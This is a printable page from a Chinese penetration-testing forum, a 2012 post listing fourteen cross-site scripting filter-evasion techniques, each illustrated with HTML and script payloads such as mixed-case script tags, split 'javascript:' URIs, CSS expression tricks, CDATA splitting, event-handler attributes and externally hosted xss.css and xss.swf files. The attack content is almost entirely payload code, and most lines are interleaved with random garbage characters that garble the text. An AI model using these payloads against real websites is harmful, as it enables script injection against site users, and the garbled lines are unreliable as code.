中国网络渗透测试联盟

标题: Cross Site Scripting(XSS)攻击手法介绍 [打印本页]

作者: admin    时间: 2012-12-31 09:59
标题: Cross Site Scripting(XSS)攻击手法介绍
1. 改变字符大小写: b) W( ]' k4 h1 ~% d' P

2 r$ m3 F1 `; ~& v
- w! d1 K3 v& p. _* }  T- Z4 O/ P& w+ X- q
    <sCript>alert(‘d’)</scRipT>% n. k% L2 \) C5 r

! e' X8 |& [) h2. 利用多加一些其它字符来规避Regular Expression的检查
. z! i" L4 a. q1 s  D0 B' h  ~& A% H& D5 |4 u1 N" S& i% K, R
    <<script>alert(‘c’)//<</script>
9 g& m; M7 |3 l4 r, u8 I7 x0 k4 [7 a" h( G+ p
    <SCRIPT a=">" SRC="t.js"></SCRIPT>& j4 r- F  l0 O/ T% H+ b

* @; Q- `8 v0 z( A$ w    <SCRIPT =">" SRC="t.js"></SCRIPT>
' {) q  h, X: Y: t' d
0 a+ t0 m! ?0 [+ Y7 R6 P8 g    <SCRIPT a=">" ” SRC="t.js"></SCRIPT>
) P, C( y+ U- u
4 W2 l- M: f0 @    <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>- p2 ~  N3 {9 k- d$ c: C; Y0 g  I; e% c4 k3 E
0 J" L, s4 j& W: C
    <SCRIPT a=`>` SRC="t.js"></SCRIPT>7 U/ o8 ?- ]5 e, D) Q# J
2 t) Q$ t* N* j, }* R& @
    <SCRIPT a=">’>" SRC="t.js"></SCRIPT>
. Z0 k7 M4 \( P; Q9 b6 r9 J& B
- J' @: y- |& m0 }) I3. 以其它扩展名取代.js9 t: [  H* ?% d1 W# O$ v7 y( Q
) m& a9 `1 _; m3 a. p6 Z0 X6 b6 q0 S
    <script src="bad.jpg"></script>+ b5 E! a4 C( E  L4 G9 s
( W, W" r  @8 r! j
4. 将Javascript写在CSS档里
4 v2 S5 |/ }8 ]: g2 l9 P1 M2 C1 Y( V5 u; C$ U# u% J: e6 K+ b
    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
. x* G! P+ f+ u. H! I  u& O8 u1 w* Q/ [
       example:0 W" c) ?* A) ]% [; n

0 a# h1 s8 h8 |/ n  O0 |          body {% k. h& P: G, V* O0 Z+ G9 H2 z0 Q
% X, m! k- Q1 S& o: j8 w5 n
               background-image: url(‘javascript:alert("XSS");’)  z# u- {% }+ L% W7 V8 D
3 @+ A" c8 L; O5 J+ J  D% M
          }5 E! J2 R  B6 D; S4 j

9 w$ ^; C2 u7 w7 }! r5. 在script的tag里加入一些其它字符7 u) D* G6 R$ F
2 k% B* X5 S4 l( B' G
    <SCRIPT/SRC="t.js"></SCRIPT>
! l7 ^3 `) h/ n3 ~1 g( `! [4 D* _3 c  V. I
    <SCRIPT/anyword SRC="t.js"></SCRIPT>
+ J# L4 U1 h- I5 l7 A9 A+ o8 E! t" {" Q( W
6. 使用tab或是new line来规避3 v0 |% w# c1 f+ n9 t9 E! Z- _

8 H/ O7 m. M. p4 M, g2 b    <img src="jav ascr ipt:alert(‘XSS3′)">$ B/ h$ y% a$ s$ d% y
" m- o0 `; r4 m* W/ F0 x
    <img src="jav ascr ipt:alert(‘XSS3′)">$ {5 }6 j: z5 Y
* R5 h4 `) V1 ~3 ?" b* G: e5 E
    <IMG SRC="jav ascript:alert(‘XSS’);">
' M3 R5 ?' J4 }! J% C
3 Z2 G, r" D9 V         -> tag
# J& K8 ?: ^' v9 i9 U% f
# V. d: U) P' Q$ e4 i         -> new line% ?" \  Y: h% B# T

" s3 H4 c0 r; |2 Z4 l* G( g7. 使用"\"来规避4 G5 H* |; `( ]! b
, f: @7 q% y9 Y" E. l0 ^' R" d
    <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
" ]! ]5 f! U! g$ M
5 {8 x, ^) C% k7 b    <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
1 B4 W* I+ d0 d: b/ n- P' o5 Z( ~  M# d$ Z. L
    <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">) |# F1 w) w4 j# e
+ R' D7 e" H( N! `
    <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
% z+ C# m! _( [2 n* t' V- {0 ?
7 ]) F& P8 ~2 A/ U, ~2 ]    <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>
9 B2 [+ V/ C. j5 N/ T9 c0 u" u: d! R( H. |
8. 使用Hex encode来规避(也可能会把";"拿掉)* d6 S% c+ ~' x# o0 p
# c! \) a$ K7 f$ k5 ?* V
    <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
, A6 N/ J+ e/ D7 [  Y0 |# B" u  f6 W! K" o3 `9 p
        原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));"># h9 o2 N6 M& c$ F& Q0 p

: I  F9 |* R# j    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
( H2 q; U2 w4 O: v4 n. ?5 n2 _, ^" y- R# T  S
        原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">9 l7 T5 N/ ^2 k7 K2 w

+ z) U. k  T4 k& e9. script in HTML tag
0 q! l/ E! F$ k  o
' F4 v! F; {0 f3 r5 \    <body onload=」alert(‘onload’)」>; V- U! i6 I$ B) c

0 i4 T% n8 o5 V- N, W3 @        onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
1 ~- ?2 Z) ?# P& b$ g% p3 a! A$ H
7 `! b; z7 u* T; ^10. 在swf里含有xss的code
* `7 O2 e! t( Z0 M0 f% x$ Q
8 |8 B7 b2 I9 X; Y. _3 j( V% C9 g    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>0 O; b' ]& J) m" g0 K4 A
" [0 J! f6 u, Q, S; R5 q6 r4 e9 G
11. 利用CDATA将xss的code拆开,再组合起来。
  _3 y) Z) c# {& i/ w1 K# `# o/ @  }4 L7 ?+ f# K
    <XML ID=I><X><C>7 t& A7 Y" J6 S# P6 u; A& H* q6 Q; u
  c* _& ?2 M# \: i& Y, V; q& z
    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>' U  U5 Y5 t# r' H) R: D% M+ k

8 w+ N- m' t: m4 ?    </C></X>
8 t! V6 m. Z' n0 I4 F+ N  M9 v1 \; m# M  H0 k$ N4 t4 O& U. ~1 d
    </xml>% r; O* x6 a* q, U

, ~/ ]& o: a/ V- p    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>2 w# W( |9 h$ t( k$ P3 ?. Q
4 S. |$ B; }! O% }9 |' e  u) ~
    <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>. N2 V' u& f, n: Y* w
2 @& ~) S" d/ _
    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
& o4 |: k; o9 g4 u, O# ?& K& c# q! f" \2 J0 @/ X6 {; ?
12. 利用HTML+TIME。
4 l7 Q1 ?/ `) U* o8 f7 v+ v& O* h- r0 z) ?# \
    <HTML><BODY>
. ^2 X8 f+ P! N% [$ t' u) U( F0 m: A$ Z, O! C. A
    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
0 @: K6 @( R4 x+ X7 x0 O, H% o
0 i0 B4 l; V/ V/ X* ~    <?import namespace="t" implementation="#default#time2">9 o( C/ Q2 ]- \  D$ A

; V- V# F1 v8 M- o* J* b% N: [8 v    <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">. r6 \: u, D% Q; B% x: m

$ z& G6 G* v( U) g2 B& W  c    </BODY></HTML>
6 J4 |" d# `9 @5 e( k  p
4 P8 P# L6 F' b. U" \3 I$ B13. 透过META写入Cookie。
- v# _& l& G% z3 v+ X% d& R( t$ p) @2 ?" d" T: ?
    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">6 S9 @( o5 P$ d* g( e7 C
" N/ ~) I6 n4 R
14. javascript in src , href , url0 k# ^1 Z0 R" O1 h( d, ?
; z  }$ m8 N+ J& \8 z/ N
    <IFRAME SRC=javascript:alert(’13′)></IFRAME>
2 d  E: r2 E. ?, ]2 g; r4 ?& y* k8 w4 L3 p' z, D
    <img src="javascript:alert(‘XSS3′)">
& `: Y7 w$ g) c7 y5 l, ^7 k: E: z5 w& F* u5 b% Q
<IMG DYNSRC="javascript:alert(‘XSS20′)">
- R: W/ S, N7 k& `) J1 D2 U1 H, T( G  e7 T" S+ b. h
    <IMG LOWSRC="javascript:alert(‘XSS21′)">( W) }  ?* ^' }( }% }) y
  g% f8 R" G  \  U- A7 }
    <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">% a, _: q: [* t: k$ P5 M
: S& X! k$ |& D, p, s
    <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>$ e  m+ T2 Z2 Y$ Y* x/ N' |
# X7 d; n+ [( d' ]- m; j4 z! Y
    <TABLE BACKGROUND="javascript:alert(‘XSS29′)">
/ p$ X- F1 z) O" C. P
# N6 `- |* ?& `2 {    <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
! R% I2 e/ r. v' J: W
1 E4 s/ u/ K1 L/ q0 f* W    <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}+ I! i7 I$ f( V: A( \; }' q; ^

, Q$ X# p: j. i+ Z    </STYLE><A CLASS=XSS></A>
5 e& V- t+ Z7 C( |* }/ M
; F9 k. U" a2 O% v    <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
- U! |5 |$ h! N' X/ E# U" z
  c  g1 |2 V. _0 R/ b* A/ Y




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2